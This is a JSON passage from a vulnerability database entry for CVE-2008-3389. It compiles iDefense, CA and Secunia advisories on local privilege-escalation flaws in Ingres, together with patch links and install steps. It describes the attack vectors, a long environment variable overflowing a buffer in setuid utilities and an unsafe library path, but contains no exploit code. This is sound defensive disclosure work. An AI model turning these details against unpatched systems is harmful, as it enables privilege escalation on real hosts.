"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the libbecompat library in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges by setting a long value of an environment variable before running (1) verifydb, (2) iimerge, or (3) csreport. Ingres Database is prone to multiple local vulnerabilities:\n- Multiple local privilege-escalation vulnerabilities\n- A vulnerability that may allow attackers to overwrite arbitrary files. \nLocal attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by \u0027Ingres\u0027 user. iDefense Security Advisory 08.01.08\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nAug 01, 2008\n\nI. BACKGROUND\n\nIngres Database is a database server used in several Computer\nAssociates\u0027 products. For example, CA Directory Service use thes Ingres\nDatabase server. More information can be found on the vendor\u0027s website\nat the following URL. \n\nhttp://ingres.com/downloads/prod-cert-download.php\n\nII. \n\nThe vulnerability exists within the \"libbecompat\" library that is used\nby several of the set-uid \"ingres\" utilities included with Ingres. When\ncopying a user supplied environment variable into a fixed-size stack\nbuffer, the library fails to check the length of the source string. \n\nIII. By itself,\nthis vulnerability does not have very serious consequences. \n\nIV. DETECTION\n\niDefense has confirmed the existence of this vulnerability in Ingres\n2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other\nversions may also be affected. \n\nV. WORKAROUND\n\niDefense is currently unaware of any workaround for this issue. \n\nVI. VENDOR RESPONSE\n\n\"This problem has been identified and resolved by Ingres in the\nfollowing releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release\n1 (9.0.4), and Ingres 2.6.\"\n\nFor more information, refer to Ingres\u0027 advisory at the following URL. \n\nhttp://www.ingres.com/support/security-alert-080108.php\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2008-3389 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n07/20/2007 Initial vendor response\n07/23/2007 Initial vendor notification\n08/01/2008 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2008 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \nTitle: CA Products That Embed Ingres Multiple Vulnerabilities\n\n\nCA Advisory Date: 2008-08-01\n\n\nReported By: iDefense Labs\n\n\nImpact: A remote attacker can execute arbitrary code, gain \nprivileges, or cause a denial of service condition. \n\n\nSummary: CA products that embed Ingres contain multiple \nvulnerabilities that can allow a remote attacker to execute \narbitrary code, gain privileges, or cause a denial of service \ncondition. These vulnerabilities exist in the products and on the \nplatforms listed below. These vulnerabilities do not impact any \nWindows-based Ingres installation. The first vulnerability, \nCVE-2008-3356, allows an unauthenticated attacker to potentially \nset the user and/or group ownership of a verifydb log file to be \nIngres allowing read/write permissions to both. The third \nvulnerability, CVE-2008-3389, allows an unauthenticated attacker \nto obtain ingres user privileges. However, when combined with the \nunsecured directory privileges vulnerability (CVE\u20132008-3357), root \nprivileges can be obtained. \n\n\nMitigating Factors: These vulnerabilities do not impact any \nWindows-based Ingres installation. \n\n\nSeverity: CA has given these vulnerabilities a High risk rating. \n\n\nAffected Products:\nAdmin r8.1 SP2\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nCA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3\nCA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nCleverPath Aion BPM r10.1, r10.2\nEEM 8.1, 8.2, 8.2.1\neTrust Audit/SCC 8.0 sp2\nIdentity Manager r12\nNSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11\nUnicenter Asset Management r11.1, r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r2.2, r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2\nUnicenter Software Delivery r11.1, r11.2\nUnicenter Workload Control Center r11\n\n\nAffected Platforms:\n1. Ingres verifydb file create permission override (CVE-2008-3356)\n This vulnerability impacts all platforms except Windows. \n2. Ingres un-secure directory privileges with utility ingvalidpw \n (CVE - 2008-3357)\n This vulnerability impacts only Linux and HP platforms. \n3. Ingres verifydb, iimerge, csreport buffer overflow \n (CVE-2008-3389)\n This vulnerability impacts only Linux and HP platforms. \n\n\nStatus and Recommendation:\nThe most prudent course of action for affected customers is to \ndownload and apply the corrective maintenance. However, updates \nare provided only for the following releases: 2.6 and r3\n\nImportant: Customers using products that embed an earlier version \nof Ingres r3 should upgrade Ingres to the release that is \ncurrently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX \nplatforms) before applying the maintenance updates. Please contact \nyour product\u0027s Technical Support team for more information. \n\nFor these products:\nAdmin r8.1 SP2\nCA ARCserve Backup for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX [3.0.3 (r64.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z\n\nHP-UX Itanium [3.0.3 (i64.hpu/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z\n\nHP-UX RISC [3.0.3 (hp2.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z\n\nLinux AMD [3.0.3 (a64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z\n\nLinux Intel 32bit [3.0.3 (int.lnx/103)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z\n\nLinux Itanium [3.0.3 (i64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z\n\nSolaris SPARC [3.0.3 (su9.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z\n\nSolaris x64/x86 [3.0.3 (a64.sol/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z\n\nIngres r3 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \u2018-m\u0027 \n flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nApply the build below that is listed for your platform (note that \nURLs may wrap):\n\nAIX\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar\n\nHP-UX Itanium\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar\n\nHP-UX RISC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar\n\nLinux AMD EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz\n\nLinux AMD II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz\n\nLinux Intel EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz\n\nLinux Intel II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz\n\nLinux Itanium EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz\n\nLinux Itanium II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz\n\nSolaris SPARC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar\n\nSolaris x64/x86\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar\n\nIngres r3 Build Install Steps (August 1, 2008)\n\nImportant: Prior to installing the build, a full operating system \nbackup of the $II_SYSTEM/ingres directory on Unix/Linux and \n%II_SYSTEM%\\ingres directory on Windows must be taken with Ingres \ncompletely shut down. Also, a backup of any other DATA locations \nthat you may have must be taken, again with Ingres shut down. In \ncase there is a problem with the update install, this allows \nIngres to be restored from the backup. \n\nUnix:\n1. Log in to the system as the installation owner and make sure \n the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres home directory\n 2. PATH must include $II_SYSTEM/ingres/bin and \n $II_SYSTEM/ingres/utility directories\n 3. Add $II_SYSTEM/ingres/lib to the shared library path\n 4. Set TERM to \u2018vt100\u0027 and TERM_INGRES to \u2018vt100fx\u0027\n2. Copy the downloaded update file to the /tmp directory and \n uncompress\n3. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This creates a directory containing the distribution and \n other files. \n4. Stop all applications that may be connected to or using any of \n the files in the Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. Also, copy the \n $II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to \n ensure that the configuration can be restored. \n7. From the root directory of the Ingres installation \n ($II_SYSTEM/ingres), run the following command:\n tar xf /tmp/\u003cupdate_directory\u003e/ingres.tar install\n8. Run the following command:\n install/ingbuild\n9. The initial install screen appears. \n10. In the Distribution medium enter the full path to the \n \u2018ingres.tar\u0027 file (including the file) (See step 4). \n11. Choose PackageInstall from the list of installation options \n and then choose \u2018Stand alone DBMS Server\u0027 from the list of \n packages. Then choose ExpressInstall. \n12. Choose Yes in the pop-up screen and press Enter key. \n The install utility verifies that each component was \n transferred properly from the distribution medium. When this \n is finished (without errors), another pop-up screen for \n setting up the components comes up. \n13. Select Yes and press Enter key to go to the Setup program. \n14. Once the installation is complete, check the \n $II_SYSTEM/ingres/files/install.log for any errors. Also, \n check the $II_SYSTEM/ingres/version.rel file to verify the new \n build is referenced; this should show 3.0.3 for the build. \n15. If there are no errors, then restore the \n $II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files from the copies made \n in step 6 to replace the existing files. \n16. Start Ingres using the \u2018ingstart\u0027 utility:\n ingstart\n17. Upgrade the databases in the installation to the new release \n level:\n upgradedb -all\n\nLinux:\n1. Log on to the machine as \u2018root\u0027. \n2. Copy the downloaded build update file and to a previously \n chosen directory and uncompress. \n3. Read in the update file with the following command:\n tar xf [update file]\n This creates a directory containing rpm packages for all of \n the Ingres tools. \n4. Shut down any non-Ingres application(s) that may be connected \n to or using any of the files in the specified Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. \n7. From the directory that was created in step 3, install the \n update rpms with the following command:\n rpm \u2013Uvh *.rpm\n If the following error is seen for either the \n \u2018ca-ingres-documentation-3.0.3-103\u0027, the \n \u2018ca-ingres-CATOSL-3.0.3-103\u0027 or the \n \u2018ca-cs-utils-11.0.04348-0000\u0027 (or all of them) packages,\n remove them from the directory containing the rpms and \n re-run the above command:\n package \u003cpackage-name\u003e is already installed\n8. If the installation finishes successfully, then log on as \n \u2018ingres\u0027 to the machine and start Ingres using the \u2018ingstart\u0027 \n utility:\n ingstart\n9. Upgrade \u2018mdb\u0027 database with the following command:\n upgradedb -all\n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter ServicePlus Service Desk 6.0\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX 32bit [2.6/xxxx (rs4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z\n\nAIX 64bit [2.6/xxxx (r64.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z\n\nHP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3\nhttps://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n\nHP-UX Itanium [2.6/xxxx (i64.hpu/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z\n\nHP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z\n\nHP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z\n\nHP Tru64 UNIX [2.6/xxxx (axp.osf/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z\n\nLinux AMD64 [2.6/xxxx (a64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z\n\nLinux Intel 32bit [2.6/xxxx (int.lnx/00)LFS]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z\n\nLinux Itanium [2.6/xxxx (i64.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z\n\nLinux S/390 [2.6/xxxx (ibm.lnx/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z\n\nSolaris SPARC 32bit [2.6/xxxx (su4.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z\n\nSolaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z\n\nSolaris SPARC 64bit [2.6/xxxx (su9.us5/00)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z\n\nIngres 2.6 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \n \u2018-m\u0027 flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\n\nHow to determine if you are affected:\n\nFor these products:\nAdmin r8.1 SP2\nARCserve for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nNotes:\n1. You would need to install the Ingres build instead of the patch \n if either of the following is true:\n 1. If the Ingres release for your platform is not 3.0.3 in \n the release identifier\n or\n 2. The Ingres release is 3.0.3 but the build level is not \n 103 for Linux and 211 for all the Unix platforms. \n If either of the above is true then download and apply the \n latest build for your operating system(s). \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nThe maintenance updates are provided for the latest r3 builds \nsupported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX \nplatforms). If the build embedded is earlier than 3.0.3, it has \nto be upgraded to 3.0.3 to fix the vulnerabilities. \n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nHP Sparc 32/64bit II 3.0.3 (hp2.us5/211)\nHP Itanium II 3.0.3 (i64.hpu/211)\nIntel Solaris 32/64bit II 3.0.3 (a64.sol/211)\nAIX 32/64bit II 3.0.3 (r64.us5/211)\nSolaris 32/64bit II 3.0.3 (su9.us5/211)\nAMD Linux II 3.0.3 (a64.lnx/211)\nIntel Linux II 3.0.3 (int.lnx/103)\nItanium Linux II 3.0.3 (i64.lnx/211)\n\nImportant:\nFor Linux (AMD, Intel and Itanium) platforms, after applying the \nbuild provided on this page, please download and apply the \nmaintenance update. For the other platforms, the builds are \npatched to the latest maintenance update. \nNote:\n1. If the release you are using is already 3.0.3 build 103 on \n Linux and 3.0.3 build 211 on Unix, then download and install \n the maintenance update. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n\nFor these products:\nCA ARCserve Backup for Unix r11.1\nCA ARCserve Backup for Unix r11.5 GA/SP1/SP2\nCA ARCserve Backup for Unix r11.5 SP3\nCA ARCserve Backup for Linux r11.1\nEEM 8.1\neTrust Audit/SCC 8.0 sp2\nNSM 3.0 0305\nNSM 3.1 0403\nNSM r3.1 SP1 0703\nUnicenter Service Catalog r2.2\nUnicenter ServicePlus Service Desk 6.0\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nAIX 32bit II 2.6/xxxx (rs4.us5/00)\nAIX 64bit II 2.6/xxxx (r64.us5/00)\nHP-UX Itanium II 2.6/xxxx (i64.hpu/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL\nHP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00)\nHP Tru64 UNIX II 2.6/xxxx (axp.osf/00)\nLinux AMD64 II 2.6/xxxx (a64.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS\nLinux Itanium II 2.6/xxxx (i64.lnx/00)\nLinux S/390 II 2.6/xxxx (ibm.lnx/00)\nSolaris SPARC 32bit II 2.6/xxxx (su4.us5/00)\nSolaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL\nSolaris SPARC 64bit II 2.6/xxxx (su9.us5/00)\n\nNote:\n1. If the Ingres release embedded in your product is not 2.6, \n please get the appropriate update here. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n3. For HP-UX platform with CA ARCserve Backup 11.1 or \n 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, \n RO01277:\n https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n and follow the enclosed instructions to install the security \n patch. \n\n\nWorkaround: None\n\n\nReferences (URLs may wrap):\nCA Support:\nhttp://support.ca.com/\nSecurity Notice for CA Products That Embed Ingres\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989\nSolution Document Reference APARs:\nRO01277 (ARCserve only)\nCA Security Response Blog posting:\nCA Products That Embed Ingres Multiple Vulnerabilities\ncommunity.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx\nReported By: \niDefense Labs\nIngres Database for Linux verifydb Insecure File Permissions \n Modification Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nIngres Database for Linux libbecompat Stack Based Buffer Overflow \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nIngres Database for Linux ingvalidpw Untrusted Library Path \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\nIngres\nSecurity Vulnerability Announcement as of August 01, 2008\nhttp://www.ingres.com/support/security-alert-080108.php\nCVE References:\nCVE-2008-3356 - Ingres verifydb file create permission override. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356\nCVE-2008-3357 - Ingres un-secure directory privileges with utility \n ingvalidpw. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357\nCVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389\nOSVDB References: Pending\nhttp://osvdb.org/\n\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\n\nCustomers who require additional information should contact CA\nTechnical Support at http://support.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. ----------------------------------------------------------------------\n\nWant a new job?\n\nhttp://secunia.com/secunia_security_specialist/\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\nInternational Partner Manager - Project Sales in the IT-Security\nIndustry:\nhttp://corporate.secunia.com/about_secunia/64/\n\n----------------------------------------------------------------------\n\nTITLE:\nIngres Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA31357\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/31357/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nIngres 2.x\nhttp://secunia.com/product/14576/\nIngres 2006 (9.x)\nhttp://secunia.com/product/14574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Ingres, which can be\nexploited by malicious, local users to gain escalated privileges. \n\n1) An error exists in the \"verifydb\" utility due to improperly\nchanging permissions on files and having the setuid-bit set (owned by\nthe \"ingres\" user). via a specially\ncrafted environmental variable. \n\n3) An error exists within the \"ingvalidpw\" utility due to being\nsetuid \"root\" and loading shared libraries from a directory owned by\nthe \"ingres\" user. \n\nSOLUTION:\nThe vendor has issued fixes. Please see the knowledge base document\n(customer login required). \nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl\n\nPROVIDED AND/OR DISCOVERED BY:\nAn anonymous researcher, reported via iDefense. \n\nORIGINAL ADVISORY:\nIngres:\nhttp://www.ingres.com/support/security-alert-080108.php\n\niDefense:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3389"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68785"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3389",
"trust": 2.9
},
{
